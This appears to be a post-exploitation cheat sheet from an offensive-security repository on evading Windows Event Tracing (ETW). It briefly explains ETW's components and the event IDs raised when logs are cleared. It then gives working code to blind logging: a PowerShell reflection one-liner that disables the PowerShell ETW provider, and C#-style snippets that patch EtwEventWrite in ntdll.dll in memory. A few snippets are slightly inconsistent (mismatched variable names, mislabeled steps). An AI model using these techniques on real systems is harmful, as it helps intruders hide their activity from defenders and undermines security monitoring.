killchain-compendium/post_exploitation/docs/windows/evade_event_tracing.md

97 lines
2.4 KiB
Markdown

# Evade Event Tracing (ETW)
* Event Logging
* Trace Logging
* Event IDs are used
* __Event Provider__ generate events
* Managed Object Format, enabled by a single trace session
* Windows Software Trace Preprocessor, Trace Message Format, enabled by a single trace session
* Manifest Based, up to 8 trace sessions
* TraceLogging, up to 8 trace sessions
* __Event Controller__ build and configure sessions for events
* __Event Consumer__ interpret events, parses sessions of selected providers
* XML data
## Log Evasion
* Deleting logs is tracked by an event ID as well . Do not do it!
* ID 1102, security audit logs cleared
* ID 104, log file cleared
* ID 1100, even service shut down
### Techniques
* Provider
* [PSEtwLogProvider modification](https://docs.microsoft.com/en-us/dotnet/standard/assembly/) from .Net assembly
* Set `m_enabled` to `$null` via powershell script
```sh
$logProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
$etwProvider = $logProvider.GetField('etwProvider','NonPublic,Static').GetValue($null)
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0);
```
* Group policy takeover
* Loaded in the same security context as the user
* GPO providers are script block logging and module logging
* Event IDs reported are `4103` (Logs command invocation) and `4104` (Logs script block execution)
* Administrative Templates -> Windows Components -> Windows PowerShell
* Log pipeline abuse
* `LogPipelineExecutionDetails` has to be set to false
* Type creation
* Controller
* Patching EtwEventWrite stored in `ntdll.dll` via return value modification
```sh
var ntdll = Win32.LoadLibrary("ntdll.dll");
var etwFunction = Win32.GetProcAddress(ntdll, "EtwEventWrite");
```
* Modify memory permissions
```c
uint oldProtect;
Win32.VirtualProtect(
etwFunction,
(UIntPtr)patch.Length,
0x40,
out oldProtect
);
```
* Copy via `Marshal.Copy`
```c
patch(new byte[] { 0xc2, 0x14, 0x00 });
Marshal.Copy(
patch,
0,
etwEventSend,
patch.Length
);
```
* Clean up
```c
VirtualProtect(etwFunction, 4, oldProtect, &oldOldProtect);
```
* Check patched instruction
```c
Win32.FlushInstructionCache(
etwFunction,
NULL
);
```
* Runtime Trace Tampering
* Consumer
* Log smashing
* Log tampering